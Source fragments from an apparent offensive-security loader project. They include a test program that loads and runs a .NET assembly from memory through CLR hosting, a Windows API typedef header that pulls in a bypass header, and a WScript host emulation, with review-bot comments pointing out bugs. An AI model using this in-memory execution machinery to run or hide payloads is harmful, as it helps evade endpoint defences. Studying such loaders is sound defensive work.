329 CopyMemory(sa->pvData, code, len);
330 printf("AppDomain::Load_3()\n");
331 hr = ad->Load_3(sa, &as);
332 if(SUCCEEDED(hr)) {
333 printf("Assembly::get_EntryPoint()\n");
334 hr = as->get_EntryPoint(&mi);
335 if(SUCCEEDED(hr)) {
336 v1.vt = VT_NULL;
337 v1.plVal = NULL;
338 printf("MethodInfo::Invoke_3()\n");
339 hr = mi->Invoke_3(v1, NULL, &v2);
340 mi->Release();
341 }
342 as->Release();
343 }
344 SafeArrayDestroy(sa);
345 }
346 ad->Release();
347 }
348 iu->Release();
349 }
350 icrh->Stop();
351 }
352 icrh->Release();
353 }
354
355 int main(int argc, char *argv[])
356 {
357 void *mem;
358 struct stat fs;
359 FILE *fd;
360
361 if(argc != 2) {
362 printf("usage: rundotnet <.NET assembly>\n");
363 return 0;
364 }
365
366 // 1. get the size of file
367 stat(argv[1], &fs);
368
369 if(fs.st_size == 0) {
370 printf("file is empty.\n");
371 return 0;
372 }
373
374 // 2. try open assembly
375 fd = fopen(argv[1], "rb");
376 if(fd == NULL) {
377 printf("unable to open \"%s\".\n", argv[1]);
378 return 0;
379 }
380 // 3. allocate memory
381 mem = malloc(fs.st_size);
382 if(mem != NULL) {
383 // 4. read file into memory
384 fread(mem, 1, fs.st_size, fd);
385 // 5. run the program from memory
386 rundotnet(mem, fs.st_size);
387 // 6. free memory
388 free(mem);
389 }
390 // 7. close assembly
391 fclose(fd);
392
393 return 0;
394 }
395
396 /**
397 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
398 BSTR i32 = SysAllocString(L"System.Int32");
399
400 as2->GetType_2(i32, &ptr);
401 idx = 0;
402 SafeArrayPutElement(sav, &idx, ptr);
403
404 BSTR alloc = SysAllocString(L"AllocHGlobal");
405 BSTR marshal = SysAllocString(L"System.Runtime.InteropServices.Marshal");
406 hr = as1->GetType_2(marshal, &mars);
407
408 hr = mars->GetMethod(alloc,
409 (mscorlib::BindingFlags)
410 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
411 NULL, // Binder
412 sav, // SAFEARRAY(_Type*)
413 NULL, // Modifiers
414 &mi); // MethodInfo
415
416 printf("System.Runtime.InteropServices.Marshal.GetMethod(AllocCoTaskMem) : %lx\n", hr);
417
418 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
419 idx = 0;
420 V_VT(&v_type) = VT_I4;
421 V_I4(&v_type) = 0x12345678;
422 SafeArrayPutElement(sav, &idx, &v_type);
423
424 v1.vt = VT_EMPTY;
425 VariantClear(&ret);
426
427 printf("Press any key to continue...\n");
428 getchar();
429
430 printf("Calling AllocCoTaskMem\n");
431 hr = mi->Invoke_3(
432 v1,
433 sav, // arguments to method
434 &ret); // return value from method
435
436 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&ret));
437 getchar();
438 return;
439 */
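Review bot: `rundotnet` calls `VariantClear` on VARIANTs that were never initialized (`ret` at gutter line 171, `unk` at 212, `v_ptr` at 283), so the API reads stack garbage as a type tag and may try to release a bogus pointer; each needs `VariantInit(&ret);` (and likewise for the others) before its first use. The HRESULTs from `Load_2`, `GetType_2` and `GetMethod` are only printed, so after a failed lookup the following `->` call runs on a null interface pointer; a guard such as `if(FAILED(hr)) return;` after each call would stop that. Everything after the bare `return;` at gutter line 221 is unreachable and should be removed or put behind a switch. In `main`, the results of `stat()` and `fread()` are not checked, so `fs.st_size` can be read uninitialized and a short read is passed on as a full buffer. The BSTRs and SAFEARRAYs allocated along the way are never freed.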
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WINAPI_H
32 #define WINAPI_H
33
34 #include <windows.h>
35 #include "bypass.h" //For the structs necessary for each bypass
36
37 typedef LPVOID (WINAPI *HeapAlloc_t)(
38 HANDLE hHeap,
39 DWORD dwFlags,
40 SIZE_T dwBytes);
41
42 typedef BOOL (WINAPI *HeapFree_t)(
43 HANDLE hHeap,
44 DWORD dwFlags,
45 LPVOID lpMem);
46
47 typedef HANDLE (WINAPI *GetProcessHeap_t)();
48 typedef DWORD (WINAPI *GetLastError_t)();
49
50 typedef LPVOID (WINAPI *HeapReAlloc_t)(
51 HANDLE hHeap,
52 DWORD dwFlags,
53 LPVOID lpMem,
54 SIZE_T dwBytes);
55
56 typedef LPSTR (WINAPI *GetCommandLineA_t)(VOID);
57 typedef LPWSTR (WINAPI *GetCommandLineW_t)(VOID);
58
59 typedef void (WINAPI *Sleep_t)(DWORD dwMilliseconds);
60
61 typedef int (WINAPI *MultiByteToWideChar_t)(
62 UINT CodePage,
63 DWORD dwFlags,
64 LPCCH lpMultiByteStr,
65 int cbMultiByte,
66 LPWSTR lpWideCharStr,
67 int cchWideChar);
68
69 typedef int (WINAPI *WideCharToMultiByte_t)(
70 UINT CodePage,
71 DWORD dwFlags,
72 LPCWCH lpWideCharStr,
73 int cchWideChar,
74 LPSTR lpMultiByteStr,
75 int cbMultiByte,
76 LPCCH lpDefaultChar,
77 LPBOOL lpUsedDefaultChar);
78
79 typedef LPWSTR* (WINAPI *CommandLineToArgvW_t)(LPCWSTR lpCmdLine, int* pNumArgs);
80
81 typedef HANDLE (WINAPI *GetCurrentProcess_t)();
82
83 // imports from shlwapi.dll
84 typedef LSTATUS (WINAPI *SHGetValueA_t)(
85 HKEY hkey,
86 LPCSTR pszSubKey,
87 LPCSTR pszValue,
88 DWORD *pdwType,
89 void *pvData,
90 DWORD *pcbData);
91
92 // imports from mscoree.dll
93 typedef HRESULT (WINAPI *CLRCreateInstance_t)(
94 REFCLSID clsid,
95 REFIID riid,
96 LPVOID *ppInterface);
97
98 typedef HRESULT (WINAPI *CorBindToRuntime_t) (
99 LPCWSTR pwszVersion,
100 LPCWSTR pwszBuildFlavor,
101 REFCLSID rclsid,
102 REFIID riid,
103 LPVOID FAR *ppv);
104
105 // imports from ole32.dll
106 typedef HRESULT (WINAPI *CoInitializeEx_t)(
107 LPVOID pvReserved,
108 DWORD dwCoInit);
109
110 typedef void (WINAPI *CoUninitialize_t)(void);
111
112 typedef HRESULT (WINAPI *CoCreateInstance_t)(
113 REFCLSID rclsid,
114 LPUNKNOWN pUnkOuter,
115 DWORD dwClsContext,
116 REFIID riid,
117 LPVOID *ppv);
118
119 typedef HRESULT (WINAPI *CreateStdDispatch_t)(
120 IUnknown *punkOuter,
121 void *pvThis,
122 ITypeInfo *ptinfo,
123 IUnknown **ppunkStdDisp);
124
125 typedef HRESULT (WINAPI *CreateErrorInfo_t)(
126 ICreateErrorInfo **pperrinfo);
127
128 typedef HRESULT (WINAPI *CreateDispTypeInfo_t)(
129 INTERFACEDATA *pidata,
130 LCID lcid,
131 ITypeInfo **pptinfo);
132
133 typedef HRESULT (WINAPI *GetErrorInfo_t)(
134 ULONG dwReserved,
135 IErrorInfo **pperrinfo);
136
137 typedef HRESULT (WINAPI *LoadTypeLib_t)(
138 LPCOLESTR szFile,
139 ITypeLib **pptlib);
140
141 typedef HRESULT (WINAPI *LoadTypeLibEx_t)(
142 LPCOLESTR szFile,
143 REGKIND regkind,
144 ITypeLib **pptlib);
145
146 typedef LCID (WINAPI *GetUserDefaultLCID_t)(VOID);
147
148 // imports from oleaut32.dll
149 typedef HRESULT (WINAPI *SafeArrayGetLBound_t)(
150 SAFEARRAY *psa,
151 UINT nDim,
152 LONG *plLbound);
153
154 typedef HRESULT (WINAPI *SafeArrayGetUBound_t)(
155 SAFEARRAY *psa,
156 UINT nDim,
157 LONG *plUbound);
158
159 typedef SAFEARRAY* (WINAPI *SafeArrayCreate_t)(
160 VARTYPE vt,
161 UINT cDims,
162 SAFEARRAYBOUND *rgsabound);
163
164 typedef SAFEARRAY* (WINAPI *SafeArrayCreateVector_t)(
165 VARTYPE vt,
166 LONG lLbound,
167 ULONG cElements);
168
169 typedef HRESULT (WINAPI *SafeArrayPutElement_t)(
170 SAFEARRAY *psa,
171 LONG *rgIndices,
172 void *pv);
173
174 typedef HRESULT (WINAPI *SafeArrayDestroy_t)(
175 SAFEARRAY *psa);
176
177 typedef BSTR (WINAPI *SysAllocString_t)(
178 const OLECHAR *psz);
179
180 typedef void (WINAPI *SysFreeString_t)(
181 BSTR bstrString);
182
183 // imports from kernel32.dll
184 typedef HMODULE (WINAPI *LoadLibraryA_t)(
185 LPCSTR lpLibFileName);
186
187 typedef FARPROC (WINAPI *GetProcAddress_t)(
188 HMODULE hModule,
189 LPCSTR lpProcName);
190
191 typedef BOOL (WINAPI *AllocConsole_t)(void);
192
193 typedef BOOL (WINAPI *AttachConsole_t)(
194 DWORD dwProcessId);
195
196 typedef BOOL (WINAPI *SetConsoleCtrlHandler_t)(
197 PHANDLER_ROUTINE HandlerRoutine,
198 BOOL Add);
199
200 typedef HANDLE (WINAPI *GetStdHandle_t)(
201 DWORD nStdHandle);
202
203 typedef BOOL (WINAPI *SetStdHandle_t)(
204 DWORD nStdHandle,
205 HANDLE hHandle);
206
207 typedef HANDLE (WINAPI *CreateEventA_t)(
208 LPSECURITY_ATTRIBUTES lpEventAttributes,
209 BOOL bManualReset,
210 BOOL bInitialState,
211 LPCSTR lpName);
212
213 typedef BOOL (WINAPI *SetEvent_t)(HANDLE hEvent);
214
215 typedef DWORD (WINAPI *GetCurrentThreadId_t)(VOID);
216
217 typedef DWORD (WINAPI *GetCurrentProcessId_t)(VOID);
218
219 typedef HHOOK (WINAPI *SetWindowsHookExA_t)(
220 int idHook,
221 HOOKPROC lpfn,
222 HINSTANCE hmod,
223 DWORD dwThreadId);
224
225 typedef BOOL (WINAPI *CreateProcessA_t)(
226 LPCSTR lpApplicationName,
227 LPSTR lpCommandLine,
228 LPSECURITY_ATTRIBUTES lpProcessAttributes,
229 LPSECURITY_ATTRIBUTES lpThreadAttributes,
230 BOOL bInheritHandles,
231 DWORD dwCreationFlags,
232 LPVOID lpEnvironment,
233 LPCSTR lpCurrentDirectory,
234 LPSTARTUPINFOA lpStartupInfo,
235 LPPROCESS_INFORMATION lpProcessInformation);
236
237 // imports from wininet.dll
238 typedef BOOL (WINAPI *InternetCrackUrl_t)(
239 LPCSTR lpszUrl,
240 DWORD dwUrlLength,
241 DWORD dwFlags,
242 LPURL_COMPONENTS lpUrlComponents);
243
244 typedef HINTERNET (WINAPI *InternetOpen_t)(
245 LPCSTR lpszAgent,
246 DWORD dwAccessType,
247 LPCSTR lpszProxy,
248 LPCSTR lpszProxyBypass,
249 DWORD dwFlags);
250
251 typedef HINTERNET (WINAPI *InternetConnect_t)(
252 HINTERNET hInternet,
253 LPCSTR lpszServerName,
254 INTERNET_PORT nServerPort,
255 LPCSTR lpszUserName,
256 LPCSTR lpszPassword,
257 DWORD dwService,
258 DWORD dwFlags,
259 DWORD_PTR dwContext);
260
261 typedef BOOL (WINAPI *InternetQueryDataAvailable_t)(
262 HINTERNET hFile,
263 LPDWORD lpdwNumberOfBytesAvailable,
264 DWORD dwFlags,
265 DWORD_PTR dwContext);
266
267 typedef HINTERNET (WINAPI *HttpOpenRequest_t)(
268 HINTERNET hConnect,
269 LPCSTR lpszVerb,
270 LPCSTR lpszObjectName,
271 LPCSTR lpszVersion,
272 LPCSTR lpszReferrer,
273 LPCSTR *lplpszAcceptTypes,
274 DWORD dwFlags,
275 DWORD_PTR dwContext);
276
277 typedef BOOL (WINAPI *InternetSetOption_t)(
278 HINTERNET hInternet,
279 DWORD dwOption,
280 LPVOID lpBuffer,
281 DWORD dwBufferLength);
282
283 typedef BOOL (WINAPI *HttpSendRequest_t)(
284 HINTERNET hRequest,
285 LPCSTR lpszHeaders,
286 DWORD dwHeadersLength,
287 LPVOID lpOptional,
288 DWORD dwOptionalLength);
289
290 typedef BOOL (WINAPI *HttpQueryInfo_t)(
291 HINTERNET hRequest,
292 DWORD dwInfoLevel,
293 LPVOID lpBuffer,
294 LPDWORD lpdwBufferLength,
295 LPDWORD lpdwIndex);
296
297 typedef BOOL (WINAPI *InternetReadFile_t)(
298 HINTERNET hFile,
299 LPVOID lpBuffer,
300 DWORD dwNumberOfBytesToRead,
301 LPDWORD lpdwNumberOfBytesRead);
302
303 typedef BOOL (WINAPI *InternetCloseHandle_t)(
304 HINTERNET hInternet);
305
306 typedef BOOL (WINAPI *CryptAcquireContext_t)(
307 HCRYPTPROV *phProv,
308 LPCSTR szContainer,
309 LPCSTR szProvider,
310 DWORD dwProvType,
311 DWORD dwFlags);
312
313 typedef void (WINAPI *GetSystemInfo_t)(
314 LPSYSTEM_INFO lpSystemInfo);
315
316 typedef HMODULE (WINAPI *GetModuleHandleA_t)(
317 LPCSTR lpModuleName);
318
319 typedef HMODULE (WINAPI *LoadLibraryExA_t)(
320 LPCSTR lpLibFileName,
321 HANDLE hFile,
322 DWORD dwFlags);
323
324 typedef HMODULE (WINAPI *LoadLibraryExW_t)(
325 LPCWSTR lpLibFileName,
326 HANDLE hFile,
327 DWORD dwFlags);
328
329 typedef BOOL (WINAPI *CryptStringToBinaryA_t)(
330 LPCSTR pszString,
331 DWORD cchString,
332 DWORD dwFlags,
333 BYTE *pbBinary,
334 DWORD *pcbBinary,
335 DWORD *pdwSkip,
336 DWORD *pdwFlags);
337
338 typedef BOOL (WINAPI *CryptDecodeObjectEx_t)(
339 DWORD dwCertEncodingType,
340 LPCSTR lpszStructType,
341 const BYTE *pbEncoded,
342 DWORD cbEncoded,
343 DWORD dwFlags,
344 PCRYPT_DECODE_PARA pDecodePara,
345 void *pvStructInfo,
346 DWORD *pcbStructInfo);
347
348 typedef BOOL (WINAPI *CryptImportPublicKeyInfo_t)(
349 HCRYPTPROV hCryptProv,
350 DWORD dwCertEncodingType,
351 PCERT_PUBLIC_KEY_INFO pInfo,
352 HCRYPTKEY *phKey);
353
354 typedef BOOL (WINAPI *CryptCreateHash_t)(
355 HCRYPTPROV hProv,
356 ALG_ID Algid,
357 HCRYPTKEY hKey,
358 DWORD dwFlags,
359 HCRYPTHASH *phHash);
360
361 typedef BOOL (WINAPI *CryptHashData_t)(
362 HCRYPTHASH hHash,
363 const BYTE *pbData,
364 DWORD dwDataLen,
365 DWORD dwFlags);
366
367 typedef BOOL (WINAPI *CryptVerifySignature_t)(
368 HCRYPTHASH hHash,
369 const BYTE *pbSignature,
370 DWORD dwSigLen,
371 HCRYPTKEY hPubKey,
372 LPCSTR szDescription,
373 DWORD dwFlags);
374
375 typedef BOOL (WINAPI *CryptDestroyHash_t)(
376 HCRYPTHASH hHash);
377
378 typedef BOOL (WINAPI *CryptDestroyKey_t)(
379 HCRYPTKEY hKey);
380
381 typedef BOOL (WINAPI *CryptReleaseContext_t)(
382 HCRYPTPROV hProv,
383 DWORD dwFlags);
384
385 typedef LPVOID (WINAPI *VirtualAlloc_t)(
386 LPVOID lpAddress,
387 SIZE_T dwSize,
388 DWORD flAllocationType,
389 DWORD flProtect);
390
391 typedef BOOL (WINAPI *VirtualFree_t)(
392 LPVOID lpAddress,
393 SIZE_T dwSize,
394 DWORD dwFreeType);
395
396 typedef HLOCAL (WINAPI *LocalFree_t)(
397 HLOCAL hMem);
398
399 typedef HRSRC (WINAPI *FindResource_t)(
400 HMODULE hModule,
401 LPCSTR lpName,
402 LPCSTR lpType);
403
404 typedef HGLOBAL (WINAPI *LoadResource_t)(
405 HMODULE hModule,
406 HRSRC hResInfo);
407
408 typedef LPVOID (WINAPI *LockResource_t)(
409 HGLOBAL hResData);
410
411 typedef DWORD (WINAPI *SizeofResource_t)(
412 HMODULE hModule,
413 HRSRC hResInfo);
414
415 typedef void (WINAPI *RtlZeroMemory_t)(
416 LPVOID Destination,
417 SIZE_T Length);
418
419 typedef BOOL (WINAPI *RtlEqualUnicodeString_t)(
420 PUNICODE_STRING String1,
421 PUNICODE_STRING String2,
422 BOOLEAN CaseInSensitive);
423
424 typedef BOOL (WINAPI *RtlEqualString_t)(
425 const ANSI_STRING * String1,
426 const ANSI_STRING * String2,
427 BOOLEAN CaseInSensitive);
428
429 typedef NTSTATUS (WINAPI *RtlUnicodeStringToAnsiString_t)(
430 PANSI_STRING DestinationString,
431 PUNICODE_STRING SourceString,
432 BOOLEAN AllocateDestinationString);
433
434 typedef void (WINAPI *RtlInitUnicodeString_t)(
435 PUNICODE_STRING DestinationString,
436 PCWSTR SourceString);
437
438 typedef void (WINAPI *RtlExitUserThread_t)(UINT uExitCode);
439
440 typedef void (WINAPI *RtlExitUserProcess_t)(NTSTATUS ExitStatus);
441
442 typedef HANDLE (WINAPI *CreateThread_t)(
443 LPSECURITY_ATTRIBUTES lpThreadAttributes,
444 SIZE_T dwStackSize,
445 LPTHREAD_START_ROUTINE lpStartAddress,
446 LPVOID lpParameter,
447 DWORD dwCreationFlags,
448 LPDWORD lpThreadId);
449
450 typedef HANDLE (WINAPI *CreateFileA_t)(
451 LPCSTR lpFileName,
452 DWORD dwDesiredAccess,
453 DWORD dwShareMode,
454 LPSECURITY_ATTRIBUTES lpSecurityAttributes,
455 DWORD dwCreationDisposition,
456 DWORD dwFlagsAndAttributes,
457 HANDLE hTemplateFile);
458
459 typedef BOOL (WINAPI *RtlCreateUnicodeString_t)(
460 PUNICODE_STRING DestinationString,
461 PCWSTR SourceString);
462
463 typedef NTSTATUS (WINAPI *RtlGetCompressionWorkSpaceSize_t)(
464 USHORT CompressionFormatAndEngine,
465 PULONG CompressBufferWorkSpaceSize,
466 PULONG CompressFragmentWorkSpaceSize);
467
468 typedef NTSTATUS (WINAPI *RtlCompressBuffer_t)(
469 USHORT CompressionFormatAndEngine,
470 PUCHAR UncompressedBuffer,
471 ULONG UncompressedBufferSize,
472 PUCHAR CompressedBuffer,
473 ULONG CompressedBufferSize,
474 ULONG UncompressedChunkSize,
475 PULONG FinalCompressedSize,
476 PVOID WorkSpace);
477
478 typedef NTSTATUS (WINAPI *RtlDecompressBuffer_t)(
479 USHORT CompressionFormatAndEngine,
480 PUCHAR UncompressedBuffer,
481 ULONG UncompressedBufferSize,
482 PUCHAR CompressedBuffer,
483 ULONG CompressedBufferSize,
484 PULONG FinalUncompressedSize);
485
486 typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
487 USHORT CompressionFormatAndEngine,
488 PUCHAR UncompressedBuffer,
489 ULONG UncompressedBufferSize,
490 PUCHAR CompressedBuffer,
491 ULONG CompressedBufferSize,
492 PULONG FinalUncompressedSize,
493 PVOID WorkSpace);
494
495 typedef NTSTATUS (WINAPI *RtlUserThreadStart_t)(
496 LPTHREAD_START_ROUTINE lpStartAddress,
497 LPVOID lpParameter);
498
499 typedef NTSTATUS (WINAPI *NtContinue_t)(
500 PCONTEXT ContextRecord,
501 BOOLEAN TestAlert);
502
503 typedef enum _SECTION_INHERIT {
504 ViewShare = 1,
505 ViewUnmap = 2
506 } SECTION_INHERIT, * PSECTION_INHERIT;
507
508 typedef BOOL (WINAPI *SetThreadContext_t)(
509 HANDLE hThread,
510 const CONTEXT *lpContext);
511
512 typedef BOOL (WINAPI *GetThreadContext_t)(
513 HANDLE hThread,
514 LPCONTEXT lpContext);
515
516 typedef HANDLE (WINAPI *GetCurrentThread_t)(VOID);
517
518 typedef PVOID (WINAPI *AddVectoredExceptionHandler_t)(
519 ULONG First,
520 PVECTORED_EXCEPTION_HANDLER Handler);
521
522 typedef ULONG (WINAPI *RemoveVectoredExceptionHandler_t)(
523 PVOID Handle);
524
525 typedef PVOID (WINAPI *AddVectoredContinueHandler_t)(
526 ULONG First,
527 PVECTORED_EXCEPTION_HANDLER Handler);
528
529 typedef ULONG (WINAPI *RemoveVectoredContinueHandler_t)(PVOID Handle);
530
531 #endif
532
533
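Review bot: `RtlEqualUnicodeString_t` and `RtlEqualString_t` (gutter lines 419-427) are declared as returning `BOOL`, but the ntdll routines return the one-byte `BOOLEAN`, so a caller testing the full 32-bit value can see undefined upper bits. Declare them as `typedef BOOLEAN (WINAPI *RtlEqualUnicodeString_t)(` and the same for `RtlEqualString_t`. `GetProcessHeap_t`, `GetLastError_t` and `GetCurrentProcess_t` use empty `()` parameter lists, which in C leave the arguments unchecked; `(VOID)` would match the rest of the header. The section comments are also out of step with the contents: the `Crypt*`, `Virtual*` and `Rtl*` typedefs all follow `// imports from wininet.dll` with no further heading, so one comment per owning DLL would make the header easier to audit.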
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize interface with methods/properties
32 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host) {
33 HRESULT hr;
34 WCHAR buf[DONUT_MAX_NAME+1];
35
36 // IUnknown interface
37 host->lpVtbl->QueryInterface = ADR(LPVOID, Host_QueryInterface);
38 host->lpVtbl->AddRef = ADR(LPVOID, Host_AddRef);
39 host->lpVtbl->Release = ADR(LPVOID, Host_Release);
40
41 // IDispatch interface
42 host->lpVtbl->GetTypeInfoCount = ADR(LPVOID, Host_GetTypeInfoCount);
43 host->lpVtbl->GetTypeInfo = ADR(LPVOID, Host_GetTypeInfo);
44 host->lpVtbl->GetIDsOfNames = ADR(LPVOID, Host_GetIDsOfNames);
45 host->lpVtbl->Invoke = ADR(LPVOID, Host_Invoke);
46
47 // IHost interface
48 host->lpVtbl->get_Name = ADR(LPVOID, Host_get_Name);
49 host->lpVtbl->get_Application = ADR(LPVOID, Host_get_Application);
50 host->lpVtbl->get_FullName = ADR(LPVOID, Host_get_FullName);
51 host->lpVtbl->get_Path = ADR(LPVOID, Host_get_Path);
52 host->lpVtbl->get_Interactive = ADR(LPVOID, Host_get_Interactive);
53 host->lpVtbl->put_Interactive = ADR(LPVOID, Host_put_Interactive);
54 host->lpVtbl->Quit = ADR(LPVOID, Host_Quit);
55 host->lpVtbl->get_ScriptName = ADR(LPVOID, Host_get_ScriptName);
56 host->lpVtbl->get_ScriptFullName = ADR(LPVOID, Host_get_ScriptFullName);
57 host->lpVtbl->get_Arguments = ADR(LPVOID, Host_get_Arguments);
58 host->lpVtbl->get_Version = ADR(LPVOID, Host_get_Version);
59 host->lpVtbl->get_BuildVersion = ADR(LPVOID, Host_get_BuildVersion);
60 host->lpVtbl->get_Timeout = ADR(LPVOID, Host_get_Timeout);
61 host->lpVtbl->put_Timeout = ADR(LPVOID, Host_put_Timeout);
62 host->lpVtbl->CreateObject = ADR(LPVOID, Host_CreateObject);
63 host->lpVtbl->Echo = ADR(LPVOID, Host_Echo);
64 host->lpVtbl->GetObject = ADR(LPVOID, Host_GetObject);
65 host->lpVtbl->DisconnectObject = ADR(LPVOID, Host_DisconnectObject);
66 host->lpVtbl->Sleep = ADR(LPVOID, Host_Sleep);
67 host->lpVtbl->ConnectObject = ADR(LPVOID, Host_ConnectObject);
68 host->lpVtbl->get_StdIn = ADR(LPVOID, Host_get_StdIn);
69 host->lpVtbl->get_StdOut = ADR(LPVOID, Host_get_StdOut);
70 host->lpVtbl->get_StdErr = ADR(LPVOID, Host_get_StdErr);
71
72 host->m_cRef = 0;
73 host->inst = inst;
74
75 DPRINT("LoadTypeLib(\"%s\")", inst->wscript_exe);
76 ansi2unicode(inst, inst->wscript_exe, buf);
77 hr = inst->api.LoadTypeLib(buf, &host->lpTypeLib);
78
79 if(hr == S_OK) {
80 DPRINT("ITypeLib::GetTypeInfoOfGuid");
81
82 hr = host->lpTypeLib->lpVtbl->GetTypeInfoOfGuid(
83 host->lpTypeLib, &inst->xIID_IHost, &host->lpTypeInfo);
84 }
85 DPRINT("HRESULT : %08lx", hr);
86 return hr;
87 }
88
89 // Queries a COM object for a pointer to one of its interface.
90 static HRESULT WINAPI Host_QueryInterface(IHost *iface, REFIID riid, void **ppv) {
91 DPRINT("WScript::QueryInterface");
92
93 if(ppv == NULL) return E_POINTER;
94
95 // we implement the following interfaces
96 if(IsEqualIID(&iface->inst->xIID_IUnknown, riid) ||
97 IsEqualIID(&iface->inst->xIID_IDispatch, riid) ||
98 IsEqualIID(&iface->inst->xIID_IHost, riid))
99 {
100 *ppv = iface;
101 return S_OK;
102 }
103 *ppv = NULL;
104 return E_NOINTERFACE;
105 }
106
107 // Increments the reference count for an interface pointer to a COM object.
108 static ULONG WINAPI Host_AddRef(IHost *iface) {
109 DPRINT("WScript::AddRef");
110
111 _InterlockedIncrement(&iface->m_cRef);
112 return iface->m_cRef;
113 }
114
115 // Decrements the reference count for an interface on a COM object.
116 static ULONG WINAPI Host_Release(IHost *iface) {
117 DPRINT("WScript::Release");
118
119 ULONG ref = _InterlockedDecrement(&iface->m_cRef);
120 return ref;
121 }
122
123 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
124 static HRESULT WINAPI Host_GetTypeInfoCount(IHost *iface, UINT *pctinfo) {
125 DPRINT("WScript::GetTypeInfoCount");
126
127 if(pctinfo == NULL) return E_POINTER;
128
129 *pctinfo = 1;
130 return S_OK;
131 }
132
133 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
134 static HRESULT WINAPI Host_GetTypeInfo(IHost *iface, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo) {
135 DPRINT("WScript::GetTypeInfo");
136
137 if(ppTInfo == NULL) return E_POINTER;
138
139 iface->lpTypeInfo->lpVtbl->AddRef(iface->lpTypeInfo);
140 *ppTInfo = iface->lpTypeInfo;
141
142 return S_OK;
143 }
144
145 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
146 // which can be used on subsequent calls to Invoke.
147 static HRESULT WINAPI Host_GetIDsOfNames(IHost *iface, REFIID riid,
148 LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
149 DPRINT("WScript::GetIDsOfNames");
150
151 return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
152 }
153
154 // Provides access to properties and methods exposed by an object.
155 // The dispatch function DispInvoke provides a standard implementation of Invoke.
156 static HRESULT WINAPI Host_Invoke(
157 IHost *iface, DISPID dispIdMember, REFIID riid,
158 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
159 EXCEPINFO *pExcepInfo, UINT *puArgErr) {
160
161 DPRINT("WScript::Invoke");
162
163 HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
164 iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
165 pVarResult, pExcepInfo, puArgErr);
166
167 DPRINT("HRESULT : %08lx", hr);
168
169 return hr;
170 }
171
172 // Returns the name of the WScript object (the host executable file).
173 static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
174 DPRINT("WScript::Name");
175
176 return S_OK;
177 }
178
179 static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
180 DPRINT("WScript::Application");
181
182 return E_NOTIMPL;
183 }
184
185 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
